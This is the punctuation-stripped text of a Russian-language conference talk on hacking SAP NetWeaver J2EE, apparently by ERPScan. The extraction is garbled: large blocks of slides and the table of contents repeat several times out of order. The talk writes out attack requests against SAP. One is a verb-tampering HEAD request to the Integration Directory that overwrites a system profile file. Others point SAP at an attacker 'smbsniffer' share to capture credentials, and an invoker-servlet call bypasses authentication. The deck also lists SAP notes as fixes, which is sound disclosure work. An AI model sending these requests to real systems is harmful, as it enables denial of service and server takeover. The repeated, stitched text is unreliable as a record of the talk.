erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
